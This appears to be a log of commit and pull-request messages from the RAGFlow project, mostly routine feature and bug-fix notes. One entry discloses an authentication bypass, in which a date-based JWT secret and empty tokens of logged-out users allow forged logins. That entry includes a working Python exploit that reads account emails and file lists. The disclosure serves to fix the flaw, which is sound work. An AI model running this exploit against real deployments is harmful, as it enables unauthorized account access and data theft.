Feat: Reference the output variable of the upstream operator #3221 (#8111)
### What problem does this PR solve?
Feat: Reference the output variable of the upstream operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
Feat: Enables the message operator form to reference the data defined by the begin operator #3221 (#8108)
### What problem does this PR solve?
Feat: Enables the message operator form to reference the data defined by
the begin operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
Feat: Receive reply messages of different event types from the agent #3221 (#8100)
### What problem does this PR solve?
Feat: Receive reply messages of different event types from the agent
#3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
fix: single task executor getting all tasks from Redis queue (#7330)
### What problem does this PR solve?
Currently, as long as there are tasks in Redis, this loop keeps fetching
them. A single task executor therefore ends up holding many tasks in the
pending state, and we then have to wait for those pending tasks before
they get back into the queue.
If `MAX_CONCURRENT_TASKS` is set to X, only X tasks should be picked
from the queue. The rest should stay in the queue for other
`task_executors`, or be picked up once one of the slots in the current
executor frees up. This PR ensures this behavior.
The additional changes come from the Ruff linting in pre-commit. I
believe they are expected, since they keep the coding style consistent.
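The intended behavior can be illustrated with a minimal sketch. It is not the code from this PR: an in-memory `asyncio.Queue` stands in for the Redis queue, and `run_executor`, `handle`, and `demo_peak_in_flight` are hypothetical names. The point it shows is that the executor reserves a free slot before it takes a task, so it never holds more than the limit at once.

```python
import asyncio


async def run_executor(queue: asyncio.Queue, handle, limit: int) -> None:
    """Pull tasks from the queue, never holding more than `limit` at once."""
    slots = asyncio.Semaphore(limit)
    running = set()
    while True:
        # Reserve a slot BEFORE taking a task, so extra tasks stay queued.
        await slots.acquire()
        task = await queue.get()
        if task is None:  # hypothetical sentinel meaning "no more tasks"
            slots.release()
            break

        async def worker(t=task):
            try:
                await handle(t)
            finally:
                slots.release()  # free the slot for the next queued task

        job = asyncio.create_task(worker())
        running.add(job)
        job.add_done_callback(running.discard)
    await asyncio.gather(*running)


async def demo_peak_in_flight(limit: int = 2, total: int = 6) -> int:
    """Run the executor on dummy tasks and report the peak concurrency."""
    queue: asyncio.Queue = asyncio.Queue()
    for i in range(total):
        queue.put_nowait(i)
    queue.put_nowait(None)

    in_flight = 0
    peak = 0

    async def handle(_task):
        nonlocal in_flight, peak
        in_flight += 1
        peak = max(peak, in_flight)
        await asyncio.sleep(0.01)  # simulated work
        in_flight -= 1

    await run_executor(queue, handle, limit)
    return peak
```

Calling `asyncio.run(demo_peak_in_flight())` reports how many tasks were ever in flight at the same time. In this sketch that number cannot exceed `limit`.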
### Type of change
- [X] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
Co-authored-by: Zhichang Yu <yuzhichang@gmail.com>
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [x] Documentation Update
Fix(python-sdk): Add name filtering support to Dataset.list_documents() (#8090)
### What problem does this PR solve?
Added name filtering capability for Dataset.list_documents()
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Fix: Resolve JSON download errors in Document.download() (#8084)
### What problem does this PR solve?
An exception is thrown only when the json file has only two keys, `code`
and `message`. In other cases, response.content is returned normally.
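A minimal sketch of the rule described above, assuming the error envelope is a JSON object whose only keys are `code` and `message`. The function name `unwrap_download` is hypothetical and is not the SDK's API.

```python
import json


def unwrap_download(content: bytes) -> bytes:
    """Return the downloaded bytes unless they are a bare error envelope."""
    try:
        parsed = json.loads(content)
    except ValueError:
        # Not JSON at all (e.g. a PDF or an image): return it untouched.
        return content
    # Only a JSON object with exactly the keys `code` and `message` is
    # treated as an error; any other JSON document is a normal download.
    if isinstance(parsed, dict) and set(parsed) == {"code", "message"}:
        raise RuntimeError(str(parsed["message"]))
    return content
```

With this check, a user's own JSON file that happens to contain `code` and `message` alongside other keys is still returned as-is.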
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Fix: Fixed an issue where using the new quote markers would cause dialogue output to have delete symbols #7623 (#8083)
### What problem does this PR solve?
Fix: Fixed an issue where using the new quote markers would cause
dialogue output to have delete symbols #7623
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Feat: Convert the inputs parameter of the begin operator #3221 (#8081)
### What problem does this PR solve?
Feat: Convert the inputs parameter of the begin operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
Feat: Solved the problem that BeginForm would get stuck when modifying data #3221 (#8080)
### What problem does this PR solve?
Feat: Solved the problem that BeginForm would get stuck when modifying
data #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
The streaming logic currently does not match the non-streaming logic,
which may cause downstream components to fail to find their upstream
components.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Fix: Authentication Bypass via predictable JWT secret and empty token validation (#7998)
### Description
There's a critical authentication bypass vulnerability that allows
remote attackers to gain unauthorized access to user accounts without
any credentials. The vulnerability stems from two security flaws: (1)
the application uses a predictable `SECRET_KEY` that defaults to the
current date, and (2) the authentication mechanism fails to properly
validate empty access tokens left by logged-out users. When combined,
these flaws allow attackers to forge valid JWT tokens and authenticate
as any user who has previously logged out of the system.
The authentication flow relies on JWT tokens signed with a `SECRET_KEY`
that, in default configurations, is set to `str(date.today())` (e.g.,
"2025-05-30"). When users log out, their `access_token` field in the
database is set to an empty string but their account records remain
active. An attacker can exploit this by generating a JWT token that
represents an empty access_token using the predictable daily secret,
effectively bypassing all authentication controls.
### Source - Sink Analysis
**Source (User Input):** HTTP Authorization header containing
attacker-controlled JWT token
**Flow Path:**
1. **Entry Point:** `load_user()` function in `api/apps/__init__.py`
(Line 142)
2. **Token Processing:** JWT token extracted from Authorization header
3. **Secret Key Usage:** Token decoded using predictable SECRET_KEY from
`api/settings.py` (Line 123)
4. **Database Query:** `UserService.query()` called with decoded empty
access_token
5. **Sink:** Authentication succeeds, returning first user with empty
access_token
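The flow above suggests two defensive checks, sketched below under stated assumptions. This is not the patch from this PR: `make_secret_key`, `is_usable_access_token`, and the `MIN_TOKEN_LENGTH` threshold are hypothetical. The sketch only shows the idea of an unpredictable fallback secret and of rejecting empty tokens before any database lookup.

```python
import secrets
from typing import Optional

MIN_TOKEN_LENGTH = 32  # hypothetical threshold, chosen for illustration


def make_secret_key(configured: Optional[str]) -> str:
    """Use the configured key, else a random one instead of today's date."""
    if configured:
        return configured
    # 32 random bytes, hex-encoded: not guessable from the calendar.
    return secrets.token_hex(32)


def is_usable_access_token(token: object) -> bool:
    """Reject missing, non-string, blank, or very short access tokens."""
    if not isinstance(token, str):
        return False
    return len(token.strip()) >= MIN_TOKEN_LENGTH
```

A random per-process fallback invalidates existing sessions on restart and would differ between worker processes, so a real deployment would more likely require an explicitly configured secret.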
### Proof of Concept
```python
import requests
from datetime import date
from itsdangerous.url_safe import URLSafeTimedSerializer
import sys


def exploit_ragflow(target):
    # Generate token with predictable key
    daily_key = str(date.today())
    serializer = URLSafeTimedSerializer(secret_key=daily_key)
    malicious_token = serializer.dumps("")

    print(f"Target: {target}")
    print(f"Secret key: {daily_key}")
    print(f"Generated token: {malicious_token}\n")

    # Test endpoints
    endpoints = [
        ("/v1/user/info", "User profile"),
        ("/v1/file/list?parent_id=&keywords=&page_size=10&page=1", "File listing")
    ]

    auth_headers = {"Authorization": malicious_token}

    for path, description in endpoints:
        print(f"Testing {description}...")
        response = requests.get(f"{target}{path}", headers=auth_headers)

        if response.status_code == 200:
            data = response.json()
            if data.get("code") == 0:
                print(f"SUCCESS {description} accessible")
                if "user" in path:
                    user_data = data.get("data", {})
                    print(f"  Email: {user_data.get('email')}")
                    print(f"  User ID: {user_data.get('id')}")
                elif "file" in path:
                    files = data.get("data", {}).get("files", [])
                    print(f"  Files found: {len(files)}")
            else:
                print("Access denied")
        else:
            print(f"HTTP {response.status_code}")
        print()


if __name__ == "__main__":
    target_url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost"
    exploit_ragflow(target_url)
```
**Exploitation Steps:**
1. Deploy RAGFlow with default configuration
2. Create a user and make at least one user log out (creating empty
access_token in database)
3. Run the PoC script against the target
4. Observe successful authentication and data access without any
credentials
**Version:** 0.19.0
@KevinHuSh @asiroliu @cike8899
Co-authored-by: nkoorty <amalyshau2002@gmail.com>
### What problem does this PR solve?
Feat: Create empty agent #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Removed hardcoded Zhipu API key from codebase
- New requirement: Tests now require ZHIPU_AI_API_KEY environment
variable
Example: export ZHIPU_AI_API_KEY=your_api_key_here
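As a rough illustration of the new requirement, a test helper could read the key from the environment and fail with a clear message when it is missing. `load_api_key` is a hypothetical helper and is not taken from the test suite.

```python
import os
from typing import Mapping, Optional

ENV_VAR = "ZHIPU_AI_API_KEY"


def load_api_key(env: Optional[Mapping[str, str]] = None) -> str:
    """Read the API key from the environment, never from source code."""
    source = os.environ if env is None else env
    key = source.get(ENV_VAR, "").strip()
    if not key:
        raise RuntimeError(
            f"{ENV_VAR} is not set; run: export {ENV_VAR}=your_api_key_here"
        )
    return key
```

Passing a mapping explicitly (instead of relying on `os.environ`) keeps the helper itself easy to test.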
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Don't use '，' (U+FF0C) but ', ' (U+2C U+20) (#8063)
The Unicode codepoint '，' (U+FF0C) is meant to be used in Chinese text,
but this is English text. It looks like a comma followed by a space, but
isn't. Of course I didn't change actual Chinese text.
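A small sketch of how such a replacement could be automated. This is an assumption for illustration, not how the PR was produced: it only rewrites a fullwidth comma that directly follows an ASCII character, which is a rough heuristic for "English text", and it leaves commas inside Chinese text alone. The name `fix_fullwidth_commas` is hypothetical.

```python
import re

# U+FF0C preceded by an ASCII character, optionally followed by one space.
_FULLWIDTH_COMMA_AFTER_ASCII = re.compile(r"(?<=[\x00-\x7f])\uff0c ?")


def fix_fullwidth_commas(text: str) -> str:
    """Replace fullwidth commas in ASCII context with ', ' (U+2C U+20)."""
    return _FULLWIDTH_COMMA_AFTER_ASCII.sub(", ", text)
```

The heuristic will miss mixed cases (for example an English word directly after a Chinese character), so a manual review of the result would still be needed.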
### What problem does this PR solve?
Mixup of Unicode characters. This is probably unnoticed by most users,
but I wonder if screen readers would read it out differently or if LLMs
would trip up on it.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Feat: Add RunSheet component #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
Feat: Allow update conversation parameters and persist to database in completion (#8039)
### What problem does this PR solve?
This PR updates the completion function to allow parameter updates when
a session_id exists. It also ensures changes are saved back to the
database via API4ConversationService.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
Fix: Allow None value for parser_config in create_dataset SDK method (#8041)
### What problem does this PR solve?
Fix parser_config=None handling in create_dataset
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Fix: Grammar and clarity improvements in prompt templates (#8023)
## Summary
Fixed grammar errors and improved clarity in prompt templates throughout
`rag/prompts.py`.
## Changes Made
- **Fixed incomplete sentence**: `"If the user's latest question is
completely, don't do anything"` → `"If the user's latest question is
already complete, don't do anything"`
- **Improved phrasing**: `"of like [ID:i]"` → `"such as [ID:i]"`
- **Added missing articles**: `"give top 3"` → `"give the top 3"`
- **Fixed prepositions**: `"in language of"` → `"in the same language
as"`
- **Corrected spelling**: `"Jappanese"` → `"Japanese"`
- **Standardized formatting**: Consistent role descriptions and
punctuation
## Impact
These changes improve prompt readability and should make instructions
clearer for the underlying language models.
## Test Plan
- [x] Verified changes maintain original prompt functionality
- [x] No breaking changes to prompt structure or expected outputs
Co-authored-by: Adrian Altermatt <adrian.altermatt@fgcz.uzh.ch>
### What problem does this PR solve?
Feat: Add DynamicPrompt component #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add AgentNode component #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
https://github.com/infiniflow/ragflow/issues/8006
The Categorize component itself should work, but its downstream
components seem unable to get its output.
This PR adds the category's output as an attribute.
However, `base.py` contains this logic:
` if self.component_name.lower().find("switch") < 0 and
self.get_component_name(u) in ["relevant", "categorize"]:
continue`
When this branch is taken, no attempt is made to get the output from
Categorize (I do not have full context on why this condition exists).
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Feat: Construct RetrievalForm with original fields #3221 (#8012)
### What problem does this PR solve?
Feat: Construct RetrievalForm with original fields #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
Feat: sync test group to top pyproject.toml (#8015)
### What problem does this PR solve?
sync test group from sdk/python/pyproject.toml to top pyproject.toml
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Update the time- and date-related entries in the synonym dictionary
file to prevent synonyms from being mistakenly escaped.
### Type of change
- [x] Refactoring
Feat: Add the example component of the classification operator #3221 (#7986)
### What problem does this PR solve?
Feat: Add the example component of the classification operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
Feat: Use one-way data flow to synchronize the form data to the canvas #3221 (#7977)
### What problem does this PR solve?
Feat: Use one-way data flow to synchronize the form data to the canvas
#3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
Fix: Unnecessary truncation in markdown parser (#7972)
### What problem does this PR solve?
Fix unnecessary truncation in the markdown parser, so that markdown
works as described in
[this comment](https://github.com/infiniflow/ragflow/issues/7824#issuecomment-2921312576)
on #7824, including support for multiple special delimiters.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Update upload filename length limit from 128 to 256, which is aligned with os (#7971)
### What problem does this PR solve?
Change filename length limit from 128 to 256
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Signed-off-by: Jin Hai <haijin.chn@gmail.com>